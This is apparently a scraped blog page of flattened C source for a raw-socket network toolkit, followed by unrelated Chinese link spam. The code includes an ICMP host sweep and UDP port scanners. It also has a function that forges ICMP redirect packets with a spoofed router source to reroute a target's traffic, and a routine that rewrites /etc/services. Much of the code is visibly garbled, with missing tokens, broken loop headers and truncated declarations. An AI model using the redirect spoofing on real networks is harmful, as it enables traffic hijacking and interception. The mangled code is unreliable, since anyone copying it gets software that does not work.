1000.0 +tvm1.tv_usec/1000.0);if(icmp->icmp_type==ICMP_UNREACH_PORT){printf("Reach !
");}else}else{printf("unknow
");fflush(stdout);}}printf("
");}exit:close(send_sd);close(recv_sd);exit(1);}void make_ip_header2(struct ip *ip,int srcip,int dstip,int iplen){memset( (char *)ip,0,sizeof(struct ip) );ip->ip_v=IPVERSION;ip->ip_hl=sizeof(struct ip) >> 2;ip->ip_id=htons(0);ip->ip_off=0;#ifdef _linux_ ip->ip_len=htons(iplen);ip->ip_off=htons(0); #else ip->ip_len=ip->ip_off=0;#endif ip->ip_ttl=64; ip->ip_p=IPPROTO_UDP; ip->ip_src.s_addr=ip->ip_dst.s_addr= ip->ip_sum=0;ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}/***************************** scan_route ************************************//***************************** redirect ************************************/void redirect(int argc,char *argv[]){struct sockaddr_unsigned char buff[1500]; struct ip *ip_ struct ip *ip_ struct icmp * struct udphdr *
int on=1; if(argc!=5){fprintf(stderr,"usage %s targetd_host old_router new_router dst_ip
",argv[CMD_NAME]); exit(EXIT_FAILURE);}if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on))<0){perror("setsockopt(IP_HDRINCL)"); exit(EXIT_FAILURE);} ip_new=(struct ip *)(buff); icmp=(struct icmp *)(buff+20); ip_old=(struct ip *)(buff+20+8); udp=(struct udphdr *)(buff+20+8+20); size=20+8+20+8; make_udp_header(udp); make_ip_header(ip_old,inet_addr(argv[TARGET_IP]),inet_addr(argv[DST_IP1]),IPPROTO_UDP,100);make_icmp5_header(icmp,inet_addr(argv[NEW_ROUTER])); make_ip_header(ip_new,inet_addr(argv[OLD_ROUTER]), inet_addr(argv[TARGET_IP]),IPPROTO_ICMP,size);memset( (char *)&dest,0,sizeof(dest) ); dest.sin_family=AF_INET; dest.sin_addr.s_addr=inet_addr(argv[TARGET_IP]);if( sendto (s,buff,size,0,(struct sockaddr *)&dest,sizeof(dest))<0 ){perror("sendto"); exit(EXIT_FAILURE);}exit(1);}void make_udp_header(struct udphdr *udp){#ifdef _FAVOR_BSD_udp->uh_sport=htons(0); udp->uh_ulen=htons( (u_short)sizeof(struct udphdr) ); udp->uh_dport=htons(33434); udp->uh_sum=htons(0);#elseudp->source=htons(0); udp->len=htons( (u_short)sizeof(struct udphdr) ); udp->dest =htons(33434); udp->check=htons(0);#endif}void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen){memset( (char *)ip,0,sizeof(struct ip) ); ip->ip_v=IPVERSION; ip->ip_hl=sizeof(struct ip) >> 2; ip->ip_id=htons(0); ip->ip_off=0; #ifdef _linux_ ip->ip_len=htons(iplen); ip->ip_off=htons(IP_DF); #else ip->ip_len= ip->ip_off=IP_DF; #endif ip->ip_ttl=2; ip->ip_p= ip->ip_src.s_addr=target_ ip->ip_dst.s_addr=dst_ ip->ip_sum=0; ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}void make_icmp5_header( struct icmp *icmp,u_int gw_ip ){icmp->icmp_type=ICMP_REDIRECT; icmp->icmp_code=ICMP_REDIRECT_HOST; icmp->icmp_gwaddr.s_addr=gw_ icmp->icmp_cksum=0; icmp->icmp_cksum=checksum( (u_short *)icmp,8+20+8 );}/***************************** redirect ************************************//***************************** scan udp port ************************************/void scan_uport(int argc,char *argv[]){printf("
Running scan udp port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56) ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan udp port ************************************//***************************** scan port ************************************/void scan_port(int argc,char *argv[]){printf("
Running scan port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56)ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan port ************************************//******************************** scan host ***********************************/void scan_host(int argc,char *argv[]){printf("
Running scan host programe my master linuxcici
");getchar();struct sockaddr_in send_char send_buff[PACKET_LEN];char recv_buff[BUFSIZE];fd_struct ip *if(argc!=4){fprintf(stderr,"usage %s start_ip last_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}startip=ntohl(inet_addr(argv[START_IP]));endip=ntohl(inet_addr(argv[LAST_IP]));memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (s=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP) )<0){perror("socket(SOCK_RAW,IPPRPTO_ICMP)");exit(EXIT_FAILURE);}for(dstip=dstip<=dstip++){send_sa.sin_addr.s_addr=htonl(dstip);for(i=0;i<3;i++){printf("scan %s(%d)
",inet_ntoa(send_sa.sin_addr),i+1);fflush(stdout);make_icmp8_packet((struct icmp *)send_buff,PACKET_LEN,i);if( sendto(s,(char *)&send_buff,PACKET_LEN,0,(struct sockaddr *)&send_sa,sizeof(send_sa))<0 ){perror("sendto");exit(EXIT_FAILURE);}tv.tv_sec=0;tv.tv_usec=200*1000;while(1){FD_ZERO(&readfd); FD_SET(s,&readfd);if( (select(s+1,&readfd,NULL,NULL,&tv) ) <=0 )if( recvfrom(s,recv_buff,BUFSIZE,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip*)recv_hlen=ip->ip_hl<<2; if(ip->ip_src.s_addr==send_sa.sin_addr.s_addr){struct icmp *icmp=(struct icmp *)(recv_buff+hlen);if(icmp->icmp_type==ICMP_ECHOREPLY){printf(" %-15s",inet_ntoa(*(struct in_addr *)&(ip->ip_src.s_addr)));gettimeofday(&tv,(struct timezone *)0);tvsub(&tv,(struct timeval *)(icmp->icmp_data));printf(": RTT=%8.4fms
",tv.tv_sec*1000.0+tv.tv_usec/1000.0);goto exit_}} }} exit_loop: ;}close(s);printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/******************************** scan host ***********************************//******************************** kill server ***********************************/char* yi_wei(char *server_save,int flag){char *r_w,*p;r_w=(char *)malloc(100* sizeof(char)); if(flag==1){*(r_w)='#';for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++)*(r_w+i+1)=*(server_save+i);*(r_w+i+1)='
';*(r_w+i+2)='';}else{for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++){if( *(server_save+i+1)=='')*(r_w+i)=*(server_save+i+1);*(r_w+i+1)='';}}memset(server_save,' ',100);strcpy(server_save,r_w);free(r_w);return server_}void off(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0;for(;*(argv[3]+i)!='';i++ ){if( *(argv[3]+i)==*(server_save+i) ) count++;}if(i==count){f_s=yi_wei(server_save,1);int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void on(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0; for(;*(argv[3]+i)!='';i++ ){if( (*(argv[3]+i)==*(server_save+i+1) )&& *(server_save)=='#') count++;}if(i==count){f_s=yi_wei(server_save,0); int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void kill_serve(int argc, char *argv[]){char server_save[100];char *server_name="/etc/services";char *tmp_name="/etc/tmp_linux";int server_FILE *server_file,*tmp_s;if(argc<4){printf("
usage: the wrong argument open/close+servername
");exit(0);}if((server_file=fopen(server_name,"r+"))==NULL){perror("can't not open server process");exit(0);}if((tmp_s=fopen(tmp_name,"w+"))==NULL){perror("can't not open server process");exit(0);}fseek(server_file,0,SEEK_SET);if( strcmp("OPEN",argv[2])==0){server_state=OPEN;}else if( strcmp("CLOSE",argv[2])==0){server_state=CLOSE;}else{printf("usage : it's not open or close
");exit(0);}while(( fgets(server_save,100,server_file) )){if(server_state==OPEN)on(argc,argv,server_save,tmp_s);if(server_state==CLOSE)off(argc,argv,server_save,tmp_s);memset(server_save,' ',100);}if(unlink("/etc/services")<0){perror("unlink failure");exit(0);}if( chdir("/etc")<0){perror("can't chdir");exit(0);} if(rename("/etc/tmp_linux","/etc/services")<0){perror("rename failure");exit(0);}printf("THXY College
");printf("
nmy Master linuxcici, it's done
");fclose(server_file); fclose(tmp_s); exit(1);}/******************************** kill server **********************************/void dump_packet(unsigned char *buff,int len){int i,j;printf("FrameDump:
");for(i=0;i<i+=16){for(j=i;j<i+16 && j< j++){printf("%02x",buff[j]);if(j%2==1)printf(" ");}if(j==len && len % 16!=0)for(j=0;j<40-(len%16)*2.5;j++)printf(" ");printf(":");for(j=i;j<i+16 && j<j++){if( (buff[j]>=0x20)&&(buff[j]<=0x7e))putchar(buff[j]);elseprintf(".");}printf("
");}fflush(stdout);}void print_udp(struct udphdr *udp){#ifdef _FAVOR_BSD_printf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->uh_sport),ntohs(udp->uh_dport));printf("Length:%5u Checksum%5u
",ntohs(udp->uh_ulen),ntohs(udp->uh_sum));#elseprintf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->source),ntohs(udp->dest));printf("Length:%5u Checksum%5u
",ntohs(udp->len),ntohs(udp->check));#endif}char *tcp_ftoa(int flag){static int f[]={'U','A','P','R','S','F'};static char str[17];u_int mask=1<<5;for(i=0;i<6;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_tcp(struct tcphdr *tcp){#ifndef __linuxprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->th_sport),ntohs(tcp->th_dport));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->th_seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->th_ack));printf("Do: %2u
Reserved F:%6s
Window size:%5u
",tcp->th_off,tcp_ftoa(tcp->th_flag),ntohs(tcp->th_win));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->th_sum),ntohs(tcp->th_urp));#elseprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->source),ntohs(tcp->dest));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->ack_seq));printf("Do: %2u
Window size:%5u
",tcp->doff,ntohs(tcp->window));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->check),ntohs(tcp->urg_ptr));#endif }void print_icmp(struct icmp *icmp){static char *type_name[]={"Echo Reply","Undefine","Undefine","Destination Unreachable","Source Quench","Redirect(changeroute)","Undefine","Undefine","Echo Request","Undefine","Undefine","Time Exceeded","Parameter Problem","Timestamp Request","Timestamp Reply","Infromation Reply","Address Mask Request","Address Mask Reply","Unknow",};int type=icmp->icmp_if(type10)type=19;printf("Protocol: ICMP(%s)
",type_name[type]);printf("Type: %3u
Checksum:%5u
",icmp->icmp_type,icmp->icmp_code,ntohs(icmp->icmp_cksum));if( icmp->icmp_type==0 || icmp->icmp_type==8 ){printf("Identification: %5u
Sequence Number: %5u
",ntohs(icmp->icmp_id),ntohs(icmp->icmp_seq));printf("-------------------------------------------
");}else if(icmp->icmp_type==3){if(icmp->icmp_code==4){printf("void:%5u
Next MTU:%5u
",ntohs(icmp->icmp_pmvoid),ntohs(icmp->icmp_nextmtu));printf("-------------------------------------------
");}else{printf("Unused:%10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}}else if(icmp->icmp_type==5){printf("Router IP Address:%15s
",inet_ntoa(*(struct in_addr *)&(icmp->icmp_gwaddr)));printf("-------------------------------------------
");}else if(icmp->icmp_type==11){printf("Unused: %10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}if( icmp->icmp_type==3 || icmp->icmp_type==5 || icmp->icmp_type==11 )print_ip( (struct ip *)( ((char *)icmp)+8 ) );}char *ip_ttoa(int flag){static int f[]={'1','1','1','D','T','R','C','X',};static char str[17];u_int mask=0x80;for(i=0;i<8;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}char *ip_ftoa(int flag){static int f[]={'R','D','M'};static char str[17];u_int mask=0x8000; for(i=0;i<3;i++) {if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_ip(struct ip *ip){printf("Protocol: IP
");printf("IV: %1u
Total Length:%10u
",ip->ip_v,ip->ip_hl,ip_ttoa(ip->ip_tos),ntohs(ip->ip_len));printf("Identifier: %5u
",ntohs(ip->ip_id),ip_ftoa(ntohs(ip->ip_off)),ntohs(ip->ip_off)&IP_OFFMASK);printf("TTL:%3u
Header Checksum:%5u
",ip->ip_ttl,ip->ip_p,ntohs(ip->ip_sum));printf("Source IP Address: %15s
",inet_ntoa(* (struct in_addr *)&(ip->ip_src) ) );printf("Destination IP Address: %15s
",inet_ntoa( *(struct in_addr *)&(ip->ip_dst )) );}void print_arp(struct ether_arp *arp){static char *arp_operation[]={"Undefine","(ARP Request)","(ARP REPLY)","(RARP Request)","(RARP Reply)",};int op=ntohs(arp->ea_hdr.ar_op);if(op<=0 || 5<op) op=0;printf("Protocol:ARP
");printf("Hard Type: %2u %-11s
",ntohs(arp->ea_hdr.ar_hrd),(ntohs(arp->ea_hdr.ar_hrd)==ARPHRD_ETHER)?"(Ethernet)":"Not Ether" ); printf("Protocol: 0x%04x %-9s
",ntohs(arp->ea_hdr.ar_pro),(ntohs(arp->ea_hdr.ar_pro==ETHERTYPE_IP))? "(IP)":"(NOT IP)");printf("Hardlen :%3u
AddrLen:%2u
OP: %4d %16s
",arp->ea_hdr.ar_hln,arp->ea_hdr.ar_pln,ntohs(arp->ea_hdr.ar_op),arp_operation[op]);printf("Source MAX Address:%17s
",mac_ntoa(arp->arp_sha));printf("Source IP Address:%15s
",inet_ntoa(*(struct in_addr *)&arp->arp_spa));printf("Destination MAC Address: %17s
",mac_ntoa(arp->arp_tha));printf("Destination IP Address: %15s
",inet_ntoa(*(struct in_addr *)&arp->arp_tpa));}void print_ethernet(struct ether_header *eth){int type=ntohs(eth->ether_type);if(type<=1500)printf("IEEE 802.3 Ethernet Frame");elseprintf("Ethernet Fram:
");printf("Destination MAC Address:%17s
",mac_ntoa(eth->ether_dhost));printf("Source MAX Address:%15s
",mac_ntoa(eth->ether_shost));if(type<1500)printf("Length: %5u
",type);elseprintf("Ethernet Type: 0X%04x
",type);}char *mac_ntoa(u_char *d){static char str[50];sprintf(str,"%02x:%02x:%02x:%02x:%02x:%02x",d[0],d[1],d[2],d[3],d[4],d[5]);}#ifndef __linuxint open_buf(char *ifname){char buf[256];for(i=0;i<4;i++){sprintf(buf,"/dev/bpf%d",i);if( (bpfd=open(buf,O_RDWR,0))>0 )goto bpf_}fprintf(stderr,"cannot open BPF
");return -1;bpf_ok: ;strcpy(ifr.ifr_name,ifname);if( ioctl(bpfd,BIOCSETIF,&ifr)<0 ){sprintf(buf,"ioctl(BIOCSETIF,'%S')",ifname);perror(buf);return -1;}fprintf(stderr,"BPF readfrom '%s'(%s)
",ifr.ifr_name,buf);if(ioctl(bpfd,BIOCPROMISC,NULL)<0){perror("ioctl(BIOCPROMISC)");return -1;}i=1;if( ioctl(bpfd,BIOCIMMEDIATE,&i)<0 ){perror("ioctl(BIOCIMMEDIATE)");return -1;}}#endif void make_icmp8_packet( struct icmp *icmp,int len,int n ){memset( (char *)icmp,0,len );gettimeofday((struct timeval *)(icmp->icmp_data),(struct timezone *)0);icmp->icmp_type=ICMP_ECHO;icmp->icmp_code=0;icmp->icmp_id=0;icmp->icmp_seq=n;icmp->icmp_cksum=0;icmp->icmp_cksum=checksum((u_short *)icmp,len);}u_short checksum(u_short *data,int len){u_long sum=0;for(;len>1;len-=2){sum+=*data++;if(sum & 0x)sum=(sum & 0xffff)+(sum>>16);}if(len==1){u_short i=0;*(u_char *)(&i)=*(u_char *)sum+=i;}while(sum>>16)sum=(sum & 0xffff)+(sum>>16);return(sum==0xffff)? sum: ~}void tvsub(struct timeval *out ,struct timeval *in){if((out->tv_usec-=in->tv_usec)<0){out->tv_sec--;out->tv_usec+=1000000; }out->tv_sec-=in->tv_}
阅读(418) | 评论(0) | 转发(0) |
相关热门文章
给主人留下些什么吧!~~
请登录后评论。}
我要回帖
更多关于 malloc函数 的文章
更多推荐
- ·QQqq号码登录异常是怎么回事怎么办?怎么办?
- ·解放j6p解放j6l原车柴暖如何开启的一下不着了,后来关了从开启动不了电源灯一直闪烁是什么情况啦?
- ·美册视频属于原创吗编辑软件为啥打不开?
- ·关于提款通道维护不给提款怎么办注单异常不给提款问题如何解决?
- ·我在其他女生抖音或者朋友圈里评论,一个女人频繁发抖音说明什么已婚女子就说我,这个是为什么啊?
- ·山东大学威海教务处分校的“测控技术与仪器”专业如何?
- ·中国计量测控网技术与仪器是什么?
- ·测控技术与仪器专业 考研 大连北方测控的那所学校最好?考试科目是什么?教材是哪一版(最好有主编和出版社)?
- ·综合自动化系统中的基本测控自动化单元的任务是什么
- ·英语学习机有什么牌子哪个好?哪种牌子的学习机有什么牌子好?
- ·经纬仪多少钱一台如何测距
- ·PH试纸(ph值酸碱度度)能否测酒精度
- ·挂字用弹簧测力计测力下的铁块重7.8N,全部浸没在水中时,用弹簧测力计测力的示数在6.8N,如果铁块有1.5的体积露出水面
- ·拉伸法测金属丝的杨氏模量实验报告的误差分析及消除办法
- ·一般导线坐标计算表点打护桩用什么方法好(测角法/坐标法)
- ·用钢筋拉伸试验验能否测量间接测量剪切弹性模量
- ·问学堂右脑王学习机有用吗好吗?右脑王学习机有用吗好不好?
- ·学习国家测绘局网站基础知识的网站有吗?
- ·c 4/7=a7/7c|c 4|=7x=7有7个三子实根汤.[[[7]]]
- ·题目为一.我对武汉大学测绘学学科的认识 二. 论武汉大学测绘学学的分类 三 .论武汉大学测绘学学的过去 现在与未来 四. 可以自命题目 字数
- ·在线等ip1=(structitem*)malloc函数(c[k]=b[j ];
- ·零维是磁单极子,一维宇宙弦,那二维表变一维表是什么,三维呢?
- ·该如何治疗?,怀孕前期有什么症状乳房痛?? 【自诅奏兹组奏】
- ·妙笔生花成语接龙龙——鱼惊鸟散
- ·马维学是什么意思人物
- ·请帮我看看这两个trigger要怎么写呢?要求如下: 非常感谢 英文啊!
- ·怎么把锭子油和绿碳化硅微粉批发分离开来?
- ·甚高频和超高频读卡器
- ·寻求超高难度绕口令难度升级版。
- ·在涵洞设计计算中,当是转弯超高路段时,H指哪里到哪里的高度?
- ·超高降效费增加费里人工费是如何计取的?
- ·超高人工降效费用的记取方法
- ·请问下高速公路过路费计算中的超高渐变如何计算
- ·公路超高和平曲线加宽计算算软件有哪些?
- ·为什么要采用台月截面效率指标作为主要技术经济指标
- ·已知一次函数y等于值等于6当6<x<8时a=zlnabylnb=zln
